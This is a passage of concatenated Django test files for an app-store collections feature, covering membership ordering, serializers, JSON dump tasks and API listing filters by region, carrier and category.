self.collection.add_app(self.apps[3])
self.assertSetEqual(self.collection.apps(), self.apps)
eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
[0, 1, 2, 3])
def test_remove_apps(self):
self._generate_apps()
self._add_apps()
self.assertSetEqual(self.collection.apps(), self.apps)
self.collection.remove_app(self.apps[0])
self.assertSetEqual(self.collection.apps(),
[self.apps[1], self.apps[2], self.apps[3]])
eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
[1, 2, 3])
self.collection.remove_app(self.apps[2])
self.assertSetEqual(self.collection.apps(),
[self.apps[1], self.apps[3]])
eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
[1, 3])
@patch('mkt.collections.models.index_webapps.delay')
def test_apps_reorder(self, mocked_index_webapps):
self._generate_apps()
self._add_apps()
reordered_pks = [self.apps[3].pk, self.apps[2].pk,
self.apps[0].pk, self.apps[1].pk]
self.collection.reorder(reordered_pks)
self.assertSetEqual(self.collection.apps().values_list('pk', flat=True),
reordered_pks)
mocked_index_webapps.assert_called_with(reordered_pks)
def test_app_deleted(self):
collection = self.collection
app = amo.tests.app_factory()
collection.add_app(app)
self.assertSetEqual(collection.apps(), [app])
self.assertSetEqual(collection.collectionmembership_set.all(),
[CollectionMembership.objects.get(collection=collection, app=app)])
app.delete()
self.assertSetEqual(collection.apps(), [])
self.assertSetEqual(collection.collectionmembership_set.all(), [])
def test_app_disabled_by_user(self):
collection = self.collection
app = amo.tests.app_factory()
collection.add_app(app)
self.assertSetEqual(collection.apps(), [app])
self.assertSetEqual(collection.collectionmembership_set.all(),
[CollectionMembership.objects.get(collection=collection, app=app)])
app.update(disabled_by_user=True)
self.assertSetEqual(collection.apps(), [])
# The collection membership still exists here, the app is not deleted,
# only disabled.
self.assertSetEqual(collection.collectionmembership_set.all(),
[CollectionMembership.objects.get(collection=collection, app=app)])
def test_app_pending(self):
collection = self.collection
app = amo.tests.app_factory()
collection.add_app(app)
self.assertSetEqual(collection.apps(), [app])
self.assertSetEqual(collection.collectionmembership_set.all(),
[CollectionMembership.objects.get(collection=collection, app=app)])
app.update(status=amo.STATUS_PENDING)
self.assertSetEqual(collection.apps(), [])
# The collection membership still exists here, the app is not deleted,
# just not public.
self.assertSetEqual(collection.collectionmembership_set.all(),
[CollectionMembership.objects.get(collection=collection, app=app)])
def test_mixed_ordering(self):
self._generate_apps()
extra_app = amo.tests.app_factory()
added = self.collection.add_app(extra_app, order=3)
eq_(added.order, 3)
self.assertSetEqual(self.collection.apps(), [extra_app])
self._add_apps()
eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
[3, 4, 5, 6, 7])
########NEW FILE########
__FILENAME__ = test_serializers
# -*- coding: utf-8 -*-
import hashlib
import json
from django.test.utils import override_settings
from nose.tools import eq_, ok_
from rest_framework import serializers
from test_utils import RequestFactory
import amo
import amo.tests
from addons.models import AddonUser, Category
from users.models import UserProfile
import mkt
from mkt.collections.constants import (COLLECTIONS_TYPE_BASIC,
COLLECTIONS_TYPE_OPERATOR)
from mkt.collections.models import Collection, CollectionMembership
from mkt.collections.serializers import (CollectionMembershipField,
CollectionSerializer,
DataURLImageField)
from mkt.constants.features import FeatureProfile
from mkt.search.views import FeaturedSearchView
from mkt.site.fixtures import fixture
from mkt.webapps.serializers import SimpleAppSerializer
class CollectionDataMixin(object):
collection_data = {
'collection_type': COLLECTIONS_TYPE_BASIC,
'name': {'en-US': u'A collection of my favourite gàmes'},
'slug': 'my-favourite-games',
'description': {'en-US': u'A collection of my favourite gamés'},
}
class BaseTestCollectionMembershipField(object):
def setUp(self):
self.collection = Collection.objects.create(**self.collection_data)
self.app = amo.tests.app_factory()
self.app.addondevicetype_set.get_or_create(
device_type=amo.DEVICE_GAIA.id)
self.collection.add_app(self.app, order=1)
self.field = CollectionMembershipField()
self.field.context = {}
self.membership = CollectionMembership.objects.all()[0]
self.profile = FeatureProfile(apps=True).to_signature()
def get_request(self, data=None):
if data is None:
data = {}
request = RequestFactory().get('/', data)
request.REGION = mkt.regions.RESTOFWORLD
request.API = True
return request
def test_to_native(self):
self.app2 = amo.tests.app_factory()
self.collection.add_app(self.app2)
apps = [self.app, self.app2]
request = self.get_request({})
resource = SimpleAppSerializer(apps)
resource.context = {'request': request}
self.field.context['request'] = request
data = self.field.to_native(self.collection.apps())
eq_(len(data), 2)
eq_(data[0]['id'], int(self.app.pk))
eq_(data[0]['resource_uri'], self.app.get_api_url(pk=self.app.pk))
eq_(data[1]['id'], int(self.app2.id))
eq_(data[1]['resource_uri'], self.app2.get_api_url(pk=self.app2.pk))
def _field_to_native_profile(self, **kwargs):
query = {'pro': '0.0', 'dev': 'firefoxos'}
query.update(kwargs)
request = self.get_request(query)
self.field.parent = self.collection
self.field.source = 'apps'
self.field.context['request'] = request
return self.field.field_to_native(self.collection, 'apps')
def test_ordering(self):
self.app2 = amo.tests.app_factory()
self.app2.addondevicetype_set.get_or_create(
device_type=amo.DEVICE_GAIA.id)
self.collection.add_app(self.app2, order=0)
self.app3 = amo.tests.app_factory()
self.app3.addondevicetype_set.get_or_create(
device_type=amo.DEVICE_GAIA.id)
self.collection.add_app(self.app3)
result = self._field_to_native_profile()
eq_(len(result), 3)
eq_(int(result[0]['id']), self.app2.id)
eq_(int(result[1]['id']), self.app.id)
eq_(int(result[2]['id']), self.app3.id)
def test_app_delete(self):
self.app.delete()
result = self._field_to_native_profile()
eq_(len(result), 0)
def test_app_disable(self):
self.app.update(disabled_by_user=True)
result = self._field_to_native_profile()
eq_(len(result), 0)
def test_app_pending(self):
self.app.update(status=amo.STATUS_PENDING)
result = self._field_to_native_profile()
eq_(len(result), 0)
def test_field_to_native_profile(self):
result = self._field_to_native_profile(pro=self.profile)
eq_(len(result), 1)
eq_(int(result[0]['id']), self.app.id)
def test_field_to_native_profile_mismatch(self):
self.app.current_version.features.update(has_geolocation=True)
result = self._field_to_native_profile(pro=self.profile)
eq_(len(result), 0)
def test_field_to_native_invalid_profile(self):
result = self._field_to_native_profile(pro='muahahah')
# Ensure that no filtering took place.
eq_(len(result), 1)
eq_(int(result[0]['id']), self.app.id)
def test_field_to_native_device_filter(self):
result = self._field_to_native_profile(pro='muahahah', dev='android',
device='mobile')
eq_(len(result), 0)
class TestCollectionMembershipField(BaseTestCollectionMembershipField,
CollectionDataMixin, amo.tests.TestCase):
pass
class TestCollectionMembershipFieldES(BaseTestCollectionMembershipField,
CollectionDataMixin,
amo.tests.ESTestCase):
"""
Same tests as TestCollectionMembershipField above, but we need a
different setUp and more importantly, we need to force a sync refresh
in ES when we modify our app.
"""
fixtures = fixture('user_2519')
def setUp(self):
super(TestCollectionMembershipFieldES, self).setUp()
self.field.context['view'] = FeaturedSearchView()
self.user = UserProfile.objects.get(pk=2519)
AddonUser.objects.create(addon=self.app, user=self.user)
self.refresh('webapp')
def _field_to_native_profile(self, **kwargs):
"""
Like _field_to_native_profile in BaseTestCollectionMembershipField,
but calling field_to_native_es directly.
"""
query = {'pro': '0.0', 'dev': 'firefoxos'}
query.update(kwargs)
request = self.get_request(query)
self.field.context['request'] = request
return self.field.field_to_native_es(self.collection, request)
def test_field_to_native_profile_mismatch(self):
self.app.current_version.features.update(has_geolocation=True)
# FIXME: a simple refresh() wasn't enough, don't we reindex apps when
# feature profiles change ? Investigate.
self.reindex(self.app.__class__, 'webapp')
result = self._field_to_native_profile(pro=self.profile)
eq_(len(result), 0)
def test_ordering(self):
self.app2 = amo.tests.app_factory()
self.collection.add_app(self.app2, order=0)
self.app3 = amo.tests.app_factory()
self.collection.add_app(self.app3)
# Extra app not belonging to a collection.
amo.tests.app_factory()
# Extra collection that has the apps in different positions.
extra_collection = Collection.objects.create(**self.collection_data)
extra_collection.add_app(self.app3)
extra_collection.add_app(self.app2)
extra_collection.add_app(self.app)
# Force refresh in ES.
self.refresh('webapp')
request = self.get_request()
self.field.context['request'] = request
result = self.field.field_to_native_es(self.collection, request)
eq_(len(result), 3)
eq_(int(result[0]['id']), self.app2.id)
eq_(int(result[1]['id']), self.app.id)
eq_(int(result[2]['id']), self.app3.id)
def test_app_delete(self):
self.app.delete()
self.refresh('webapp')
result = self._field_to_native_profile()
eq_(len(result), 0)
def test_app_disable(self):
self.app.update(disabled_by_user=True)
self.refresh('webapp')
result = self._field_to_native_profile()
eq_(len(result), 0)
def test_app_pending(self):
self.app.update(status=amo.STATUS_PENDING)
self.refresh('webapp')
result = self._field_to_native_profile()
eq_(len(result), 0)
class TestCollectionSerializer(CollectionDataMixin, amo.tests.TestCase):
def setUp(self):
minimal_context = {
'request': RequestFactory().get('/whatever')
}
self.collection = Collection.objects.create(**self.collection_data)
self.serializer = CollectionSerializer(self.collection,
context=minimal_context)
def test_metadata_is_serialized_to_json(self):
ok_(json.dumps(self.serializer.metadata()))
def test_to_native(self, apps=None):
if apps:
for app in apps:
self.collection.add_app(app)
else:
apps = []
data = self.serializer.to_native(self.collection)
for name, value in self.collection_data.iteritems():
eq_(self.collection_data[name], data[name])
self.assertSetEqual(data.keys(), [
'apps', 'author', 'background_color', 'carrier', 'category',
'collection_type', 'default_language', 'description', 'id',
'image', 'is_public', 'name', 'region', 'slug', 'text_color'
])
for order, app in enumerate(apps):
eq_(data['apps'][order]['slug'], app.app_slug)
return data
def test_to_native_operator(self):
self.collection.update(collection_type=COLLECTIONS_TYPE_OPERATOR)
data = self.serializer.to_native(self.collection)
ok_('can_be_hero' in data.keys())
@override_settings(STATIC_URL='https://testserver-cdn/')
def test_image(self):
data = self.serializer.to_native(self.collection)
eq_(data['image'], None)
self.collection.update(image_hash='bbbbbb')
data = self.serializer.to_native(self.collection)
self.assertApiUrlEqual(data['image'],
'/rocketfuel/collections/%s/image.png?bbbbbb' % self.collection.pk,
scheme='https', netloc='testserver-cdn')
def test_wrong_default_language_serialization(self):
# The following is wrong because we only accept the 'en-us' form.
data = {'default_language': u'en_US'}
serializer = CollectionSerializer(instance=self.collection, data=data,
partial=True)
eq_(serializer.is_valid(), False)
ok_('default_language' in serializer.errors)
def test_name_required(self):
data = {
'description': u'some description',
'collection_type': u'1'
}
serializer = CollectionSerializer(instance=self.collection, data=data)
eq_(serializer.is_valid(), False)
ok_('name' in serializer.errors)
def test_name_cannot_be_empty(self):
data = {
'name': u''
}
serializer = CollectionSerializer(instance=self.collection, data=data,
partial=True)
eq_(serializer.is_valid(), False)
ok_('name' in serializer.errors)
eq_(serializer.errors['name'],
[u'The field must have a length of at least 1 characters.'])
def test_name_all_locales_cannot_be_empty(self):
data = {
'name': {
'fr': u'',
'en-US': u''
}
}
serializer = CollectionSerializer(instance=self.collection, data=data,
partial=True)
eq_(serializer.is_valid(), False)
ok_('name' in serializer.errors)
def test_name_one_locale_must_be_non_empty(self):
data = {
'name': {
'fr': u'',
'en-US': u'Non-Empty Name'
}
}
serializer = CollectionSerializer(instance=self.collection, data=data,
partial=True)
eq_(serializer.is_valid(), True)
def test_translation_deserialization(self):
data = {
'name': u'¿Dónde está la biblioteca?'
}
serializer = CollectionSerializer(instance=self.collection, data=data,
partial=True)
eq_(serializer.errors, {})
ok_(serializer.is_valid())
def test_translation_deserialization_multiples_locales(self):
data = {
'name': {
'fr': u'Chat grincheux…',
'en-US': u'Grumpy Cat...'
}
}
serializer = CollectionSerializer(instance=self.collection, data=data,
partial=True)
eq_(serializer.errors, {})
ok_(serializer.is_valid())
def test_empty_choice_deserialization(self):
# Build data from existing object.
data = self.serializer.to_native(self.collection)
data.pop('id')
# Emulate empty values passed via POST.
data.update({'carrier': '', 'region': ''})
instance = self.serializer.from_native(data, None)
eq_(self.serializer.errors, {})
ok_(self.serializer.is_valid())
eq_(instance.region, None)
eq_(instance.carrier, None)
def test_to_native_with_apps(self):
apps = [amo.tests.app_factory() for n in xrange(1, 5)]
data = self.test_to_native(apps=apps)
keys = data['apps'][0].keys()
ok_('name' in keys)
ok_('id' in keys)
def validate(self, **kwargs):
return self.serializer.validate(kwargs)
def test_validation_operatorshelf_category(self):
category = Category.objects.create(name='BastaCorp', slug='basta',
type=amo.ADDON_WEBAPP)
ok_(self.validate(collection_type=COLLECTIONS_TYPE_BASIC,
category=category))
ok_(self.validate(collection_type=COLLECTIONS_TYPE_OPERATOR))
with self.assertRaises(serializers.ValidationError):
self.validate(collection_type=COLLECTIONS_TYPE_OPERATOR,
category=category)
IMAGE_DATA = """
R0lGODlhKAAoAPMAAP////vzBf9kA90JB/IIhEcApQAA0wKr6h+3FABkElYsBZBxOr+/v4CAgEBA
QAAAACH/C05FVFNDQVBFMi4wAwEAAAAh/h1HaWZCdWlsZGVyIDAuMiBieSBZdmVzIFBpZ3VldAAh
+QQECgD/ACwAAAAAKAAoAEMEx5DJSSt9z+rNcfgf5oEBxlVjWIreQ77wqqWrW8e4fKJ2ru9ACS2U
CW6GIBaSOOu9lMknK2dqrog2pYhp7Dir3fAIHN4tk8XyBKmFkU9j0tQnT6+d2K2qrnen2W10MW93
WIZogGJ4dIRqZ41qTZCRXpOUPHWXXjiWioKdZniBaI6LNX2ZQS1aLnOcdhYpPaOfsAxDrXOiqKlL
rL+0mb5Qg7ypQru5Z1S2yIiHaK9Aq1lfxFxGLYe/P2XLUprOzOGY4ORW3edNkREAIfkEBAoA/wAs
AAAAACgAKABDBMqQyUkrfc/qzXH4YBhiXOWNAaZ6q+iS1vmps1y3Y1aaj/vqu6DEVhN2einfipgC
XpA/HNRHbW5YSFpzmXUaY1PYd3wSj3fM3JlXrZpLsrIc9wNHW71pGyRmcpM0dHUaczc5WnxeaHp7
b2sMaVaPQSuTZCqWQjaOmUOMRZ2ee5KTkVSci22CoJRQiDeviXBhh1yfrBNEWH+jspC3S3y9dWnB
sb1muru1x6RshlvMeqhP0U3Sal8s0LZ5ikamItTat7ihft+hv+bqYI8RADs=
"""
class TestDataURLImageField(CollectionDataMixin, amo.tests.TestCase):
def test_from_native(self):
data, hash_ = DataURLImageField().from_native(
'data:image/gif;base64,' + IMAGE_DATA)
eq_(hash_, hashlib.md5(IMAGE_DATA.decode('base64')).hexdigest()[:8])
eq_(data.read(), IMAGE_DATA.decode('base64'))
########NEW FILE########
__FILENAME__ = test_tasks
import json
import mock
from tempfile import mkdtemp
from django.test.utils import override_settings
from nose.tools import eq_
import amo
import amo.tests
from mkt.collections.models import Collection
from mkt.collections.tasks import dump_collection, dump_collections
from mkt.webapps.tasks import rm_directory
from mkt.site.fixtures import fixture
temp_directory = mkdtemp()
@override_settings(DUMPED_APPS_PATH=temp_directory)
class TestDumpCollections(amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'collection_81721')
def get_collection(self):
return Collection.objects.get(pk=81721)
def tearDown(self):
rm_directory(temp_directory)
def test_dump_collections(self):
filename = dump_collections([81721])[0]
collection_json = json.load(open(filename, 'r'))
eq_(collection_json['id'], 81721)
eq_(collection_json['slug'], 'public-apps')
def test_dump_collection(self):
collection = self.get_collection()
filename = dump_collection(collection)
collection_json = json.load(open(filename, 'r'))
eq_(collection_json['id'], 81721)
eq_(collection_json['slug'], 'public-apps')
@mock.patch('mkt.collections.tasks.dump_collection')
def test_dumps_public_collection(self, dump_collection):
dump_collections([81721])
assert dump_collection.called
@mock.patch('mkt.collections.tasks.dump_collection')
def test_doesnt_dump_public_collection(self, dump_collection):
collection = self.get_collection()
collection.update(is_public=False)
dump_collections([81721])
assert not dump_collection.called
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import hashlib
import json
import os
from random import shuffle
from urlparse import urlparse
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.http import QueryDict
from django.test.utils import override_settings
from django.utils import translation
from nose import SkipTest
from nose.tools import eq_, ok_
from PIL import Image
from rest_framework.exceptions import PermissionDenied
import amo
import amo.tests
import mkt
from addons.models import Category
from amo.utils import slugify
from mkt.api.tests.test_oauth import RestOAuth
from mkt.collections.constants import (COLLECTIONS_TYPE_BASIC,
COLLECTIONS_TYPE_FEATURED,
COLLECTIONS_TYPE_OPERATOR)
from mkt.collections.models import Collection
from mkt.collections.views import CollectionViewSet
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.collections.tests.test_serializers import (CollectionDataMixin,
IMAGE_DATA)
from users.models import UserProfile
class BaseCollectionViewSetTest(RestOAuth):
"""
Base class for all CollectionViewSet tests.
"""
fixtures = fixture('user_2519', 'user_999')
def setUp(self):
super(BaseCollectionViewSetTest, self).setUp()
self.collection_data = {
'author': u'My Àuthør',
'background_color': '#FFF000',
'collection_type': COLLECTIONS_TYPE_BASIC,
'description': {'en-US': u'A cöllection of my favorite games'},
'is_public': True,
'name': {'en-US': u'My Favorite Gamés'},
'slug': u'my-favourite-gamés',
'text_color': '#000FFF',
}
self.collection = Collection.objects.create(**self.collection_data)
self.apps = []
self.list_url = reverse('collections-list')
self.user = UserProfile.objects.get(pk=2519)
self.user2 = UserProfile.objects.get(pk=999)
def setup_unique(self):
"""
Additional setup required to test collection category/region/carrier
uniqueness constraints.
"""
self.category = Category.objects.create(type=amo.ADDON_WEBAPP,
name='Grumpy', slug='grumpy-cat')
self.collection_data = {
'collection_type': COLLECTIONS_TYPE_FEATURED,
'name': 'Featured Apps are cool',
'slug': 'featured-apps-are-cool',
'description': 'Featured Apps really are the bomb',
'region': mkt.regions.SPAIN.id,
'carrier': mkt.carriers.TELEFONICA.id,
'category': self.category,
'is_public': True,
}
self.collection = Collection.objects.create(**self.collection_data)
self.grant_permission(self.profile, 'Collections:Curate')
def create_apps(self, number=1):
"""
Create `number` apps, adding them to `self.apps`.
"""
for n in xrange(0, number):
self.apps.append(amo.tests.app_factory())
def add_apps_to_collection(self, *args):
"""
Add each app passed to `*args` to `self.collection`.
"""
for app in args:
self.collection.add_app(app)
def make_curator(self):
"""
Make the authenticating user a curator on self.collection.
"""
self.collection.add_curator(self.profile)
def make_publisher(self):
"""
Grant the Collections:Curate permission to the authenticating user.
"""
self.grant_permission(self.profile, 'Collections:Curate')
def collection_url(self, action, pk):
"""
Return the URL to a collection API endpoint with primary key `pk` to do
action `action`.
"""
return reverse('collections-%s' % action, kwargs={'pk': pk})
def create_additional_data(self):
"""
Creates two additional categories and three additional collections.
"""
self.category = Category.objects.create(slug='ccc', name='CatCatCat',
type=amo.ADDON_WEBAPP)
self.empty_category = Category.objects.create(slug='emptycat',
name='Empty Cat',
type=amo.ADDON_WEBAPP)
eq_(Category.objects.count(), 2)
collection_data = {
'collection_type': COLLECTIONS_TYPE_BASIC,
'description': 'A collection of my favorite spanish games',
'name': 'My Favorite spanish games',
'region': mkt.regions.SPAIN.id,
'carrier': mkt.carriers.UNKNOWN_CARRIER.id,
}
self.collection2 = Collection.objects.create(**collection_data)
collection_data = {
'collection_type': COLLECTIONS_TYPE_BASIC,
'description': 'A collection of my favorite phone games',
'name': 'My Favorite phone games',
'carrier': mkt.carriers.TELEFONICA.id,
}
self.collection3 = Collection.objects.create(**collection_data)
collection_data = {
'collection_type': COLLECTIONS_TYPE_BASIC,
'description': 'A collection of my favorite categorized games',
'name': 'My Favorite categorized games',
'region': mkt.regions.SPAIN.id,
'carrier': mkt.carriers.TELEFONICA.id,
'category': self.category
}
self.collection4 = Collection.objects.create(**collection_data)
class TestCollectionViewSetListing(BaseCollectionViewSetTest):
"""
Tests the handling of GET/OPTIONS requests to the list endpoint of
CollectionViewSet.
"""
def listing(self, client):
self.create_apps()
self.add_apps_to_collection(*self.apps)
res = client.get(self.list_url)
data = json.loads(res.content)
eq_(res.status_code, 200)
collection = data['objects'][0]
apps = collection['apps']
# Verify that the apps are present in the correct order.
for order, app in enumerate(self.apps):
eq_(apps[order]['slug'], app.app_slug)
# Verify that the collection metadata is in tact.
for field, value in self.collection_data.iteritems():
eq_(collection[field], self.collection_data[field])
def test_listing(self):
self.listing(self.anon)
def test_listing_no_perms(self):
self.listing(self.client)
def test_listing_has_perms(self):
self.make_publisher()
self.listing(self.client)
def test_options_has_perms(self):
self.make_publisher()
res = self.client.options(self.list_url)
eq_(res.status_code, 200)
def test_listing_curator(self):
self.make_curator()
self.listing(self.client)
def test_listing_single_lang(self):
self.collection.name = {
'fr': u'Basta la pomme de terre frite',
}
self.collection.save()
res = self.client.get(self.list_url, {'lang': 'fr'})
data = json.loads(res.content)
eq_(res.status_code, 200)
collection = data['objects'][0]
eq_(collection['name'], u'Basta la pomme de terre frite')
eq_(collection['description'], u'A cöllection of my favorite games')
def test_listing_filter_unowned_hidden(self):
"""
Hidden collections that you do not own should not be returned.
"""
self.create_apps()
self.add_apps_to_collection(*self.apps)
self.collection.update(is_public=False)
res = self.client.get(self.list_url)
data = json.loads(res.content)
eq_(res.status_code, 200)
eq_(len(data['objects']), 0)
def test_listing_filter_owned_hidden(self):
"""
Hidden collections that you do own should be returned.
"""
self.create_apps()
self.add_apps_to_collection(*self.apps)
self.collection.update(is_public=False)
self.collection.curators.add(self.user)
res = self.client.get(self.list_url)
data = json.loads(res.content)
eq_(res.status_code, 200)
eq_(len(data['objects']), 1)
def test_listing_pagination(self):
self.create_additional_data()
self.make_publisher() # To be able to see non-public collections.
res = self.client.get(self.list_url, {'limit': 3})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 3)
eq_(data['objects'][0]['id'], self.collection4.pk)
eq_(data['objects'][1]['id'], self.collection3.pk)
eq_(data['objects'][2]['id'], self.collection2.pk)
eq_(data['meta']['total_count'], 4)
eq_(data['meta']['limit'], 3)
eq_(data['meta']['previous'], None)
eq_(data['meta']['offset'], 0)
next = urlparse(data['meta']['next'])
ok_(next.path.startswith('/api/v1'))
eq_(next.path, self.list_url)
eq_(QueryDict(next.query).dict(), {u'limit': u'3', u'offset': u'3'})
res = self.client.get(self.list_url, {'limit': 3, 'offset': 3})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 1)
eq_(data['objects'][0]['id'], self.collection.pk)
eq_(data['meta']['total_count'], 4)
eq_(data['meta']['limit'], 3)
prev = urlparse(data['meta']['previous'])
ok_(prev.path.startswith('/api/v1'))
eq_(next.path, self.list_url)
eq_(QueryDict(prev.query).dict(), {u'limit': u'3', u'offset': u'0'})
eq_(data['meta']['offset'], 3)
eq_(data['meta']['next'], None)
def test_listing_no_filtering(self):
self.create_additional_data()
self.make_publisher()
res = self.client.get(self.list_url)
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 4)
ok_('API-Fallback' not in res)
def test_listing_filtering_error(self):
res = self.client.get(self.list_url, {'region': 'whateverdude'})
eq_(res.status_code, 400)
data = json.loads(res.content)
eq_(data['detail'], 'Filtering error.')
errors = data['filter_errors']
ok_(errors['region'][0].startswith('Select a valid choice.'))
def test_listing_filtering_worldwide(self):
self.create_additional_data()
self.make_publisher()
row_res = self.client.get(self.list_url, {'region': 'restofworld'})
row_data = json.loads(row_res.content)
ww_res = self.client.get(self.list_url, {'region': 'worldwide'})
ww_data = json.loads(ww_res.content)
eq_(row_res.status_code, 200)
eq_(ww_res.status_code, 200)
eq_(len(row_data['objects']), 2)
eq_(row_data, ww_data)
def test_listing_filtering_region(self):
self.create_additional_data()
self.make_publisher()
self.collection.update(region=mkt.regions.PL.id)
res = self.client.get(self.list_url,
{'region': mkt.regions.SPAIN.slug})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 2)
eq_(collections[0]['id'], self.collection4.pk)
eq_(collections[1]['id'], self.collection2.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_region_id(self):
self.create_additional_data()
self.make_publisher()
self.collection.update(region=mkt.regions.PL.id)
res = self.client.get(self.list_url,
{'region': mkt.regions.SPAIN.id})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 2)
eq_(collections[0]['id'], self.collection4.pk)
eq_(collections[1]['id'], self.collection2.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_carrier(self):
self.create_additional_data()
self.make_publisher()
res = self.client.get(self.list_url,
{'carrier': mkt.carriers.TELEFONICA.slug})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 2)
eq_(collections[0]['id'], self.collection4.pk)
eq_(collections[1]['id'], self.collection3.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_carrier_id(self):
self.create_additional_data()
self.make_publisher()
res = self.client.get(self.list_url,
{'carrier': mkt.carriers.TELEFONICA.id})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 2)
eq_(collections[0]['id'], self.collection4.pk)
eq_(collections[1]['id'], self.collection3.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_carrier_null(self):
self.create_additional_data()
self.make_publisher()
res = self.client.get(self.list_url, {'carrier': ''})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 1)
eq_(collections[0]['id'], self.collection.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_carrier_0(self):
self.create_additional_data()
self.make_publisher()
res = self.client.get(self.list_url,
{'carrier': mkt.carriers.UNKNOWN_CARRIER.id})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 1)
eq_(collections[0]['id'], self.collection2.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_region_null(self):
self.create_additional_data()
self.make_publisher()
res = self.client.get(self.list_url, {'region': ''})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 2)
eq_(collections[0]['id'], self.collection3.pk)
eq_(collections[1]['id'], self.collection.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_category(self):
self.create_additional_data()
self.make_publisher()
res = self.client.get(self.list_url, {'cat': self.category.slug})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 1)
eq_(collections[0]['id'], self.collection4.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_category_id(self):
self.create_additional_data()
self.make_publisher()
res = self.client.get(self.list_url, {'cat': self.category.pk})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 1)
eq_(collections[0]['id'], self.collection4.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_category_null(self):
self.create_additional_data()
self.make_publisher()
res = self.client.get(self.list_url, {'cat': ''})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 3)
eq_(collections[0]['id'], self.collection3.pk)
eq_(collections[1]['id'], self.collection2.pk)
eq_(collections[2]['id'], self.collection.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_category_region_carrier(self):
self.create_additional_data()
self.make_publisher()
res = self.client.get(self.list_url, {
'cat': self.category.slug,
'region': mkt.regions.SPAIN.slug,
'carrier': mkt.carriers.TELEFONICA.slug
})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 1)
eq_(collections[0]['id'], self.collection4.pk)
ok_('API-Fallback' not in res)
def test_listing_filtering_category_region_carrier_fallback(self):
self.create_additional_data()
self.make_publisher()
# Test filtering with a non-existant category + region + carrier.
# It should fall back on category + carrier + region=NULL, not find
# anything either, then fall back to category + region + carrier=NULL,
# again not find anything, then category + region=NULL + carrier=NULL,
# and stop there, still finding no results.
res = self.client.get(self.list_url, {
'cat': self.empty_category.slug,
'region': mkt.regions.SPAIN.slug,
'carrier': mkt.carriers.SPRINT.slug
})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 0)
eq_(res['API-Fallback'], 'region,carrier')
def test_listing_filtering_nonexistant_carrier(self):
self.create_additional_data()
self.make_publisher()
Collection.objects.all().update(carrier=mkt.carriers.TELEFONICA.id)
self.collection.update(region=mkt.regions.SPAIN.id, carrier=None)
# Test filtering with a region+carrier that doesn't match any
# Collection. It should fall back on region=NULL+carrier, not find
# anything, then fallback on carrier=NULL+region and find the
# Collection left in spain with no carrier.
res = self.client.get(self.list_url, {
'region': mkt.regions.SPAIN.slug,
'carrier': mkt.carriers.SPRINT.slug
})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 1)
eq_(collections[0]['id'], self.collection.pk)
eq_(res['API-Fallback'], 'carrier')
def test_listing_filtering_nonexistant_carrier_and_region(self):
self.create_additional_data()
self.make_publisher()
nyan = Category.objects.create(type=amo.ADDON_WEBAPP, name='Nyan Cat',
slug='nyan-cat')
Collection.objects.all().update(carrier=None, region=None,
category=nyan)
self.collection.update(category=self.category)
# Test filtering with a non-existant carrier and region. It should
# go through all fallback till ending up filtering on category +
# carrier=NULL + region=NULL.
res = self.client.get(self.list_url, {
'region': mkt.regions.UK.slug,
'carrier': mkt.carriers.SPRINT.slug,
'cat': self.category.pk
})
eq_(res.status_code, 200)
data = json.loads(res.content)
collections = data['objects']
eq_(len(collections), 1)
eq_(collections[0]['id'], self.collection.pk)
eq_(res['API-Fallback'], 'region,carrier')
class TestCollectionViewSetDetail(BaseCollectionViewSetTest):
"""
Tests the handling of GET requests to a single collection on
CollectionViewSet.
"""
def detail(self, client, collection_id=None):
self.create_apps(number=2)
self.add_apps_to_collection(*self.apps)
url = self.collection_url('detail',
collection_id or self.collection.pk)
res = client.get(url)
data = json.loads(res.content)
eq_(res.status_code, 200)
# Verify that the collection metadata is in tact.
for field, value in self.collection_data.iteritems():
eq_(data[field], self.collection_data[field])
# Verify that the apps are present in the correct order.
for order, app in enumerate(self.apps):
eq_(data['apps'][order]['slug'], app.app_slug)
return res, data
def test_detail_filtering(self):
self.collection.update(region=mkt.regions.SPAIN.id)
url = self.collection_url('detail', self.collection.pk)
res = self.client.get(url, {
'region': mkt.regions.RESTOFWORLD.slug
})
# Filtering should not be applied.
eq_(res.status_code, 200)
data = json.loads(res.content)
